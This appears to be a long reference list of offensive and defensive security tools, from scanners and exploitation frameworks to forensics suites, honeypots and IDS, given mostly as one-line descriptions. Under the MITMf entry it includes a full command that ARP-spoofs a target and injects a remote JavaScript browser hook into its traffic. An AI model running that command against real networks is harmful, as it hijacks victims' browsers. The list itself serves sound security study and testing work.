- Ruler - Tool for remotely interacting with Exchange servers.
- OpenVAS - Open source implementation of the popular Nessus vulnerability assessment system.
- Nessus - Commercial network vulnerability scanner.
- Nexpose - Commercial vulnerability and risk management assessment engine that integrates with Metasploit, sold by Rapid7.
- Vuls - Agentless Linux/FreeBSD vulnerability scanner written in Go.
- Netsparker Web Application Security Scanner - Commercial web application security scanner to automatically find many different types of security flaws.
- OWASP Zed Attack Proxy (ZAP) - Feature-rich, scriptable HTTP intercepting proxy and fuzzer for penetration testing web applications.
- Burp Suite - Commercial web vulnerability scanner, with limited community edition.
- Nikto - Noisy but fast black box web server and web application vulnerability scanner.
- WPScan - Black box WordPress vulnerability scanner.
- cms-explorer - Reveal the specific modules, plugins, components and themes that various websites powered by content management systems are running.
- ACSTIS - Automated client-side template injection (sandbox escape/bypass) detection for AngularJS.
- SQLmate - A friend of sqlmap that identifies sqli vulnerabilities based on a given dork and website (optional).
- ASafaWeb - Free online web vulnerability scanner.
- Browser Exploitation Framework (BeEF) - Command and control server for delivering exploits to commandeered Web browsers.
- Wordpress Exploit Framework - Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems.
- WPSploit - Exploit WordPress-powered websites with Metasploit.
- commix - Command Injection exploitation tool.
- Drupwn - Drupal web application exploitation tool.
- SQLmap - Automated SQL injection and database takeover tool.
- sqlninja - Automated SQL injection and database takeover tool.
- libformatstr - Python script designed to simplify format string exploits.
- tplmap - Automatic server-side template injection and Web server takeover tool.
- weevely3 - Weaponized web shell.
- wafw00f - Identifies and fingerprints Web Application Firewall (WAF) products.
- fimap - Find, prepare, audit, exploit and even Google automatically for LFI/RFI bugs.
- Kadabra - Automatic LFI exploiter and scanner.
- Kadimus - LFI scan and exploit tool.
- liffy - LFI exploitation tool.
- Commix - Automated all-in-one operating system command injection and exploitation tool.
- sslstrip - Demonstration of the HTTPS stripping attacks.
- sslstrip2 - SSLStrip version to defeat HSTS.
- NoSQLmap - Automatic NoSQL injection and database takeover tool.
- VHostScan - A virtual host scanner that performs reverse lookups, can be used with pivot tools, detect catch-all scenarios, aliases and dynamic default pages.
- FuzzDB - Dictionary of attack patterns and primitives for black-box application fault injection and resource discovery.
- EyeWitness - Tool to take screenshots of websites, provide some server header info, and identify default credentials if possible.
- webscreenshot - A simple script to take screenshots from a list of websites.
- IIS-Shortname-Scanner - Command line tool to exploit the Windows IIS tilde information disclosure vulnerability.
- lyncsmash - a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations
- Network-Tools.com - Website offering an interface to numerous basic network utilities like
ping
,traceroute
,whois
, and more. - Intercepter-NG - Multifunctional network toolkit.
- SPARTA - Graphical interface offering scriptable, configurable access to existing network infrastructure scanning and enumeration tools.
- dsniff - Collection of tools for network auditing and pentesting.
- scapy - Python-based interactive packet manipulation program & library.
- Printer Exploitation Toolkit (PRET) - Tool for printer security testing capable of IP and USB connectivity, fuzzing, and exploitation of PostScript, PJL, and PCL printer language features.
- Praeda - Automated multi-function printer data harvester for gathering usable data during security assessments.
- routersploit - Open source exploitation framework similar to Metasploit but dedicated to embedded devices.
- impacket - Collection of Python classes for working with network protocols.
- dnstwist - Domain name permutation engine for detecting typo squatting, phishing and corporate espionage.
- THC Hydra - Online password cracking tool with built-in support for many network protocols, including HTTP, SMB, FTP, telnet, ICQ, MySQL, LDAP, IMAP, VNC, and more.
- Ncat - TCP/IP command line utility supporting multiple protocols.
- pig - GNU/Linux packet crafting tool.
- Low Orbit Ion Cannon (LOIC) - Open source network stress testing tool.
- Sockstress - TCP based DoS utility.
- UFONet - Layer 7 DDoS/DoS tool.
- Zarp - Multipurpose network attack tool, both wired and wireless.
- FireAway - Firewall audit and security bypass tool.
- enumdb - MySQL and MSSQL bruteforce utilityl
- tcpdump/libpcap - Common packet analyzer that runs under the command line.
- Wireshark - Widely-used graphical, cross-platform network protocol analyzer.
- Yersinia - Packet and protocol analyzer with MITM capability.
- Fiddler - Cross platform packet capturing tool for capturing HTTP/HTTPS traffic.
- netsniff-ng - Swiss army knife for Linux network sniffing.
- Dshell - Network forensic analysis framework.
- Chaosreader - Universal TCP/UDP snarfing tool that dumps session data from various protocols.
- Responder - Open source NBT-NS, LLMNR, and MDNS poisoner.
- Responder-Windows - Windows version of the above NBT-NS/LLMNR/MDNS poisoner.
- MITMf - Multipurpose man-in-the-middle framework.
- e.g.
mitmf --arp --spoof -i eth0 --gateway 192.168.1.1 --targets 192.168.1.20 --inject --js-url http://192.168.1.137:3000/hook.js
- e.g.
- dnschef - Highly configurable DNS proxy for pentesters.
- mitmproxy - Interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers.
- Morpheus - Automated ettercap TCP/IP Hijacking tool.
- SSH MITM - Intercept SSH connections with a proxy; all plaintext passwords and sessions are logged to disk.
- evilgrade - Modular framework to take advantage of poor upgrade implementations by injecting fake updates.
- Ettercap - Comprehensive, mature suite for machine-in-the-middle attacks.
- BetterCAP - Modular, portable and easily extensible MITM framework.
- Aircrack-ng - Set of tools for auditing wireless networks.
- WiFi Pumpkin - All in one Wi-Fi exploitation and spoofing utility.
- MANA Toolkit - Rogue AP and man-in-the-middle utility.
- Wifite - Automated wireless attack tool.
- Fluxion - Suite of automated social engineering based WPA attacks.
- NetStumbler - WLAN scanning tool.
- Kismet - Wireless network discovery tool.
- tlssled - Comprehensive TLS/SSL testing suite.
- SSLscan - Quick command line SSL/TLS analyzer.
- SSLyze - Fast and comprehensive TLS/SSL configuration analyzer to help identify security mis-configurations.
- SSL Labs - Online TLS/SSL testing suite for revealing supported TLS/SSL versions and ciphers.
- crackpkcs12 - Multithreaded program to crack PKCS#12 files (
.p12
and.pfx
extensions), such as TLS/SSL certificates. - spoodle - Mass subdomain + POODLE vulnerability scanner.
- FeatherDuster - Analysis tool for discovering flaws in cryptography.
- rsatool - Tool for calculating RSA and RSA-CRT parameters.
- xortool - XOR cipher analysis tool.
- CrackMapExec - Multipurpose post-exploitation suite containing many plugins.
- DBC2 - Multipurpose post-exploitation tool.
- Empire - PowerShell based (Windows) and Python based (Linux/OS X) post-exploitation framework.
- EvilOSX - macOS backdoor with docker support.
- FruityC2 - Open source, agent-based post-exploitation framework with a web UI for management.
- PowerOPS - PowerShell and .NET based runspace portable post-exploitation utility.
- ProcessHider - Post-exploitation tool for hiding processes.
- RemoteRecon - Post-exploitation utility making use of multiple agents to perform different tasks.
- TheFatRat - Tool designed to generate remote access trojans (backdoors) with msfvenom.
- Koadic - Windows post-exploitation rootkit, primarily utilizing Windows Script Host.
- p0wnedShell - PowerShell based post-exploitation utility utilizing .NET.
- poet - Simple but multipurpose post-exploitation tool.
- Pupy - Open source cross-platform post-exploitation tool, mostly written in Python.
- PlugBot - Can be installed onto an ARM device for Command & Control use and more.
- Fathomless - A collection of post-exploitation tools for both Linux and Windows systems.
- Portia - Automated post-exploitation tool for lateral movement and privilege escalation.
- HTTPTunnel - Tunnel data over pure HTTP GET/POST requests.
- Data Exfiltration Toolkit (DET) - Proof of concept to perform data exfiltration using either single or multiple channel(s) at the same time.
- mimikatz - Credentials extraction tool for Windows operating system.
- mimikittenz - Post-exploitation PowerShell tool for extracting data from process memory.
- pwnat - Punches holes in firewalls and NATs.
- dnsteal - Fake DNS server for stealthily extracting files.
- tgcd - Simple Unix network utility to extend the accessibility of TCP/IP based network services beyond firewalls.
- Iodine - Tunnel IPv4 data through a DNS server; useful for exfiltration from networks where Internet access is firewalled, but DNS queries are allowed.
- PassHunt - Search file systems for passwords.
- PANHunt - Search file systems for credit cards.
- mallory - HTTP/HTTPS proxy over SSH.
- spYDyishai - Local Google credentials exfiltration tool, written in Python.
- MailSniper - Search through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.).
- OWASP Dependency Check - Open source static analysis tool that enumerates dependencies used by Java and .NET software code (with experimental support for Python, Ruby, Node.js, C, and C++) and lists security vulnerabilities associated with the depedencies.
- VisualCodeGrepper - Open source static code analysis tool with support for Java, C, C++, C#, PL/SQL, VB, and PHP. VisualCodeGrepper also conforms to OWASP best practices.
- Veracode - Commercial cloud platform for static code analysis, dynamic code analysis, dependency/plugin analysis, and more.
- Brakeman - Static analysis security vulnerability scanner for Ruby on Rails applications.
- cppcheck - Extensible C/C++ static analyzer focused on finding bugs.
- FindBugs - Free software static analyzer to look for bugs in Java code.
- sobelow - Security-focused static analysis for the Phoenix Framework.
- bandit - Security oriented static analyser for python code.
- Progpilot - Static security analysis tool for PHP code.
- ShellCheck - Static code analysis tool for shell script.
- Codebeat (open source) - Open source implementation of commercial static code analysis tool with GitHub integration.
- smalisca - Android static code analysis tool.
- Androwarn - Android static code analysis tool.
- APKinspector - Android APK analysis tool with GUI.
- pefile - Static portable executable file inspector.
- Androbugs-Framework - Android program vulnerability analysis tool.
- Joint Advanced Defense Assessment for Android Applications (JAADAS) - Multipurpose Android static analysis tool.
- Quick Android Review Kit (Qark) - Tool for finding security related Android application vulnerabilities.
- truffleHog - Git repo scanner.
- Yara - Static pattern analysis tool for malware researchers.
- Icewater - 16,432 free Yara rules.
- Cheat Engine - Memory debugger and hex editor for running applications.
- Cuckoo - Automated dynamic malware analysis tool.
- ConDroid - Android dynamic application analysis tool.
- drozer - Android platform dynamic vulnerability assessment tool.
- DECAF - Dynamic code analysis tool.
- droidbox - Dynamic malware analysis tool for Android, extension to DECAF.
- AndroidHooker - Dynamic Android application analysis tool.
- Inspeckage - Dynamic Android package analysis tool.
- Androl4b - Android security virtual machine based on Ubuntu-MATE for reverse engineering and malware analysis.
- idb - iOS app security analyzer.
- HexEdit.js - Browser-based hex editing.
- Hexinator - World's finest (proprietary, commercial) Hex Editor.
- Frhed - Binary file editor for Windows.
- Kaitai Struct - File formats and network protocols dissection language and web IDE, generating parsers in C++, C#, Java, JavaScript, Perl, PHP, Python, Ruby.
- Veles - Binary data visualization and analysis tool.
- Hachoir - Python library to view and edit a binary stream as tree of fields and tools for metadata extraction.
- shellsploit - Generates custom shellcode, backdoors, injectors, optionally obfuscates every byte via encoders.
- Hyperion - Runtime encryptor for 32-bit portable executables ("PE
.exe
s"). - AntiVirus Evasion Tool (AVET) - Post-process exploits containing executable files targeted for Windows machines to avoid being recognized by antivirus software.
- peCloak.py - Automates the process of hiding a malicious Windows executable from antivirus (AV) detection.
- peCloakCapstone - Multi-platform fork of the peCloak.py automated malware antivirus evasion tool.
- UniByAv - Simple obfuscator that takes raw shellcode and generates Anti-Virus friendly executables by using a brute-forcable, 32-bit XOR key.
- Shellter - Dynamic shellcode injection tool, and the first truly dynamic PE infector ever created.
- Windows-SignedBinary - AV evasion tool for binary files.
- SigThief - Stealing signatures to evade AV.
- Hashcat - Fast hash cracking utility with support for most known hashes as well as OpenCL and CUDA acceleration.
- John the Ripper - Fast password cracker.
- John the Ripper Jumbo edition - Community enhanced version of John the Ripper.
- CeWL - Generates custom wordlists by spidering a target's website and collecting unique words.
- CrackStation - Online password cracker.
- JWT Cracker - Simple HS256 JWT token brute force cracker.
- Rar Crack - RAR bruteforce cracker.
- Sysinternals Suite - The Sysinternals Troubleshooting Utilities.
- PowerSploit - PowerShell Post-Exploitation Framework.
- Headstart - Lazy man's Windows privilege escalation tool utilizing PowerSploit.
- Windows Exploit Suggester - Suggests Windows exploits based on patch levels.
- Windows Credentials Editor - Inspect logon sessions and add, change, list, and delete associated credentials, including Kerberos tickets.
- Bloodhound - Graphical Active Directory trust relationship explorer.
- Empire - Pure PowerShell post-exploitation agent.
- Fibratus - Tool for exploration and tracing of the Windows kernel.
- redsnarf - Post-exploitation tool for retrieving password hashes and credentials from Windows workstations, servers, and domain controllers.
- Magic Unicorn - Shellcode generator for numerous attack vectors, including Microsoft Office macros, PowerShell, HTML applications (HTA), or
certutil
(using fake certificates). - DeathStar - Python script that uses Empire's RESTful API to automate gaining Domain Admin rights in Active Directory environments.
- PSKernel-Primitives - Exploiting primitives for PowerShell.
- GetVulnerableGPO - PowerShell based utility for finding vulnerable GPOs.
- Luckystrike - PowerShell based utility for the creation of malicious Office macro documents.
- Commentator - PowerShell script for adding comments to MS Office documents, and these comments can contain code to be executed.
- Hyena - NetBIOS exploitation.
- Linux Exploit Suggester - Heuristic reporting on potentially viable exploits for a given GNU/Linux system.
- Linus - Security auditing tool for Linux and macOS.
- vuls - Linux/FreeBSD agentless vulnerability scanner.
- Mempodipper - Linux Kernel 2.6.39 < 3.2.2 local privilege escalation script.
- Bella - Pure Python post-exploitation data mining and remote administration tool for macOS.
- Linus - Security auditing tool for Linux and macOS.
- GoVanguard/list-socialengineering-resources - GoVanguard's list of social engineering resources.
- Shodan - World's first search engine for Internet-connected devices.
- Maltego - Proprietary software for open source intelligence and forensics, from Paterva.
- Alienvault Open Threat Exchange (OTX) - Live threat feed.
- Talos Intelligence - Live threat feed.
- Cymon - Threat intelligence feed.
- Combine - Open source threat intelligence feed gathering tool.
- ThreatCrowd - Threat search engine.
- AbuseIPDB - Search engine for blacklisted IPs or domains.
- Apility - Search engine for blacklisted IPs or domains.
- AutoShun - Public repository of malicious IPs and other resources.
- Binary Defense IP Ban List - Public IP blacklist.
- Blocklist Ipsets - Public IP blacklist.
- ThreatTracker - Python based IOC tracker.
- malc0de Database - Searchable incident database.
- malc0de DNSSinkhole - List of domains that have been identified as distributing malware during the past 30 days.
- Malware Domain List - Search and share malicious URLs.
- Machinae - Multipurpose OSINT tool using threat intelligence feeds.
- Mxtoolbox - Email domain and DNS lookup.
- BadIPs - Online blacklist lookup.
- Spamhaus - Online blacklist lookup.
- Spamcop - IP based blacklist.
- Robtex - Domain and IP address lookup.
- theHarvester - E-mail, subdomain and people names harvester.
- DNSDumpster - Online DNS recon and search service.
- dnsenum - Perl script that enumerates DNS information from a domain, attempts zone transfers, performs a brute force dictionary style attack, and then performs reverse look-ups on the results.
- dnsmap - Passive DNS network mapper.
- dnsrecon - DNS enumeration script.
- dnstracer - Determines where a given DNS server gets its information from, and follows the chain of DNS servers.
- passivedns-client - Library and query tool for querying several passive DNS providers.
- passivedns - Network sniffer that logs all DNS server replies for use in a passive DNS setup.
- creepy - Geolocation OSINT tool.
- Google Hacking Database - Database of Google dorks; can be used for recon.
- GooDork - Command line Google dorking tool.
- dork-cli - Command line Google dork tool.
- Censys - Collects data on hosts and websites through daily ZMap and ZGrab scans.
- recon-ng - Full-featured Web Reconnaissance framework written in Python.
- github-dorks - CLI tool to scan github repos/organizations for potential sensitive information leak.
- vcsmap - Plugin-based tool to scan public version control systems for sensitive information.
- Spiderfoot - Open source OSINT automation tool with a Web UI and report visualizations
- Threat Crowd - Search engine for threats.
- PacketTotal - Simple, free, high-quality packet capture file analysis facilitating the quick detection of network-borne malware (using Bro and Suricata IDS signatures under the hood).
- gOSINT - OSINT tool with multiple modules and a telegram scraper.
- Amass - Subdomain enumeration via scraping, web archives, brute forcing, permutations, reverse DNS sweeping, TLS certificates, passive DNS data sources, etc.
- XRay - XRay is a tool for recon, mapping and OSINT gathering from public networks.
- Intel Techniques Online Tools - Use the links to the left to access all of the custom search tools.
- FindFrontableDomains - Multithreaded tool for finding frontable domains.
- CloudFrunt - Tool for identifying misconfigured CloudFront domains.
- Linkedin2Username - Web scraper that uses valid LinkedIn credentials to put together a list of employees for a specified company.
- Raven - LinkedIn information gathering tool.
- InfoByIp - Domain and IP bulk lookup tool.
- Tor - Free software and onion routed overlay network that helps you defend against traffic analysis.
- I2P - The Invisible Internet Project.
- OnionScan - Tool for investigating the Dark Web by finding operational security issues introduced by Tor hidden service operators.
- What Every Browser Knows About You - Comprehensive detection page to test your own Web browser's configuration for privacy and identity leaks.
- VirusTotal - Online malware scanner.
- PacketTotal - Online pcap file analyzer.
- NetworkTotal - Online pcap file analyzer.
- Hybrid Analysis - Online malware scanner.
- Malaice.io - Open source malware analyzer.
- Cuckoo Sandbox - Online malware scanner.
- Cuckoo Modified - Fork of Cuckoo Sandbox with multiple improvements.
- Cuckoo Modified API - Python API for Cuckoo Modified.
- Cryptam - Online malicious document scanner.
- Ragpicker - Malware analysis tool.
- DRAKVUF - Virtualization based agentless black-box binary analysis system.
- Sandboxed Execution Environment - Framework for building sandboxed malware execution environments.
- Malheur - Automated sandbox analysis of malware behavior.
- Metadefender - Online file and hash analyzer.
- Interactive Disassembler (IDA Pro) - Proprietary multi-processor disassembler and debugger for Windows, GNU/Linux, or macOS; also has a free version, IDA Free.
- WDK/WinDbg - Windows Driver Kit and WinDbg.
- OllyDbg - x86 debugger for Windows binaries that emphasizes binary code analysis.
- Radare2 - Open source, crossplatform reverse engineering framework.
- x64dbg - Open source x64/x32 debugger for windows.
- firmware.re - Firmware analyzier.
- HaboMalHunter - Automated malware analysis tool for Linux ELF files.
- Immunity Debugger - Powerful way to write exploits and analyze malware.
- Evan's Debugger - OllyDbg-like debugger for GNU/Linux.
- Medusa - Open source, cross-platform interactive disassembler.
- plasma - Interactive disassembler for x86/ARM/MIPS. Generates indented pseudo-code with colored syntax code.
- peda - Python Exploit Development Assistance for GDB.
- dnSpy - Tool to reverse engineer .NET assemblies.
- binwalk - Fast, easy to use tool for analyzing, reverse engineering, and extracting firmware images.
- PyREBox - Python scriptable Reverse Engineering sandbox by Cisco-Talos.
- Voltron - Extensible debugger UI toolkit written in Python.
- Capstone - Lightweight multi-platform, multi-architecture disassembly framework.
- rVMI - Debugger on steroids; inspect userspace processes, kernel drivers, and preboot environments in a single tool.
- PDF Examiner - Online PDF scanner.
- Balbuzard - Malware analysis tool with reverse obfuscation.
- de4dot - .NET deobfuscator and unpacker.
- FireEye Labs Obfuscated String Solver (FLOSS) - Malware deobfuscator.
- NoMoreXOR - Frequency analysis tool for trying to crack 256-bit XOR keys.
- PackerAttacker - Generic hidden code extractor for Windows malware.
- unXOR - Tool that guesses XOR keys using known plaintext attacks.
- xortool - Tool for guessing XOR keys.
- VirtualDeobfuscator - Reverse engineering tool for virtualization wrappers.
- ChipWhisperer - Complete open-source toolchain for side-channel power analysis and glitching attacks.
- SIFT Workstation - Linux distro (with optional VM) for digital forensics.
- SANS Investigative Forensics Toolkit (SIFT) - Linux VM for digital forensics.
- DEFT Linux - Linux distro for digital forensics analysis.
- Appliance for Digital Investigation and Analysis (ADIA) - VMware virtual appliance for digital forensics.
- PALADIN - Linux distro for digital forensics.
- CAINE - Italian live Linux distro for digital forensics.
- Maltego - Proprietary software for open source intelligence and forensics, from Paterva.
- The Sleuth Kit - Collection of command line digital forensic utilities for investigating disk images, volume and file system data, and more.
- Autopsy - Graphical interface to The Sleuth Kit.
- Digital Forensics Framework (DFF) - Open source digital forensics framework with GUI.
- nightHawk - Platform for digital forensics presentation, using Elasticsearch.
- IREC - All in one evidence collector.
- Rekall - Incident response and forensics tool.
- PSRecon - Windows based data gathering tool using PowerShell.
- Regripper - Windows Registry data extraction tool.
- PowerForensics - PowerShell based digital forensics suite.
- Fast Evidence Collector Toolkit (FECT) - Lightweight digital forensics tool.
- Foremost - File recovery tool.
- extundelete - ext3 and ext4 file recovery tool.
- magneto-malware-scanner - Malware scanning platform.
- FireEye Labs Obfuscated String Solver (FLOSS) - Extract obfuscated strings from malware.
- Dumpzilla - Python based application for dumping information from Firefox, Iceweasel, and Seamonkey browsers.
- pdfid - PDF digital forensics software.
- pdf-parser - PDF digital forensics software.
- peepdf - Python PDF analysis tool.
- pdfminer - Tool for extracting information from the text of PDF documents.
- binwalk - Firmware analysis tool.
- bulk_extractor - Command line tool for extracting email addresses, credit card numbers, URLs, and other types of information from many types of files, including compressed files and images.
- chkrootkit - Checks local Linux systems for rootkits.
- docker-explorer - Docker file system forensic tool.
- GRR Rapid Response - Incident response framework focused on remote live forensics.
- Linux Expl0rer - Easy-to-use live forensics toolbox for Linux endpoints written in Python & Flask.
- Chrome URL Dumper - Python based agent that gathers and dumps Chrome history (URLs).
- Hindsight - Chrome/Chromium browser forensics tool.
- Volatility - Advanced memory forensics framework.
- VolatilityBot - Automation tool utilizing Volatility.
- Evolve - Web interface for Volatility advanced memory forensics framework.
- inVtero.net - Windows x64 memory analysis tool.
- Linux Memory Extractor (LiME) - A Loadable Kernel Module (LKM) allowing for volatile memory extraction of Linux-based systems.
- Memoryze - Memory forensics software.
- Responder PRO - Commercial memory analysis software.
- WindowsSCOPE - Commercial memory forensics software for Windows systems.
- Microsoft User Mode Process Dumper - Dumps any running Win32 processes memory image on the fly.
- PMDump - Tool for dumping memory contents of a process without stopping the process.
- Osquery - Multiplatform framework for querying operating systems similar to SQL queries.
- RedHunt OS - Purposely vulnerable Linux VM.
- APT Simulator - Windows Batch Script that makes a system appear compromised.
- Atomic Red Team - Set of premade tests to evaluate security posture.
- AutoTTP - Automated Tactics Techniques & Procedures, for re-issuing complex tasks.
- Blue Team Training Toolkit - Toolkit for preparing blue teams for defensive security.
- Caldera - Automated adversary emulation system.
- DumpsterFire Toolset - Security event simulator.
- Metta - Open source adversary simulation.
- Network Flight Simulator - Utility for generating malicious network traffic.
- Red Team Automation (RTA) - Adversary simulation framework.
- Belkasoft Evidence Center - Commercial incident response suite.
- CIRTKit - Open source incident response framework.
- Cyber Triage - Commercial incident response suite.
- Doorman - Osquery fleet manager.
- Falcon Orchestrator - Windows based incident management framework.
- GRR Rapid Response - Python based incident mangement framework.
- Kolide Fleet - Open source osquery manager.
- LimaCharlie - Cross-platform open source endpoint detection and response solution.
- MIG - Mozilla InvestiGator - Endpoint inspection.
- MozDef - Mozilla defense platform.
- Redline - Investigative tool able to scan processes, memory, file system metadata, and more.
- Zentral - Monitors system events using osquery.
- Modern Honey Network (mhn) - Multipurpose honeypot with centralized management and many integrations.
- dionaea - Multipurpose honeypot.
- glutton - Multipurpose honeypot.
- Cowrie - SSH/Telnet honeypot.
- Cowrie Docker - Docker version of Cowrie, SSH/Telnet honeypot.
- Shadow Daemon - Collection of tools to detect, record, and prevent attacks on web applications.
- elastichoney - Elasticsearch honeypot.
- Honeypress - WordPress honeypot in a docker container.
- wp-smart-honeypot - WordPress plugin and honeypot designed to reduce comment spam.
- Wordpot - WordPress honeypot.
- MongoDB-HoneyProxy - MongoDB honeypot.
- MysqlPot - MySQL honeypot.
- Nosqlpot - NoSQL honeypot.
- bap - Basic Authentication honeyPot - HTTP basic authentication web service honeypot.
- Nodepot - NodeJS web application honeypot.
- Servletpot - Web application honeypot written in Java, making use of Apache HttpClient libraries, MySQL connector, Cassandra connector.
- phpmyadmin_honeypot - PHPMyAdmin honeypot.
- SpamScope - Spam analysis tool.
- Thug - Python based honeyclient tool.
- conpot - ICS/SCADA honeypot.
- glastopf - Python based web application honeypot.
- smart-honeypot - PHP based honeypot.
- Security Onion - Linux distro for monitoring.
- Snort - Open source NIPS/NIDS.
- OSSEC - Open source HIDS.
- AIEngine - Very advanced NIDS.
- Suricata - Open source NIPS/NIDS.
- SSHWATCH - SSH IPS.
- Elastic Stack - Also known as the ELK stack, the combination of Elasticsearch, Logstash, and Kibana, for monitoring and logging.
- Kayak Car Hacking Tool - Tool for Kayak car hacking.
- ROPgadget - Python based tool to aid in ROP exploitation.
- Shellen - Interactive shellcoding environment.
- Netzob - Multipurpose tool for reverse engineering, modeling, and fuzzing communciation protocols.
- Sulley - Fuzzing engine and framework.
- Zulu - Interactive fuzzer
- honggfuzz - Security orientated fuzzing tool.
- radamsa - General purpose fuzzing tool.
- fuzzbox - Multi-codec media fuzzing tool.
- melkor-android - Android fuzzing tool for ELF file formats.
- BruteX Wordlists - Wordlist repo.
- Google Hacking Master List
- GoVanguard sample reports (https://github.com/GoVanguard/doc-infosec-report-samples)
- Offensive Security sample pentest report (https://www.offensive-security.com/reports/sample-penetration-testing-report.pdf)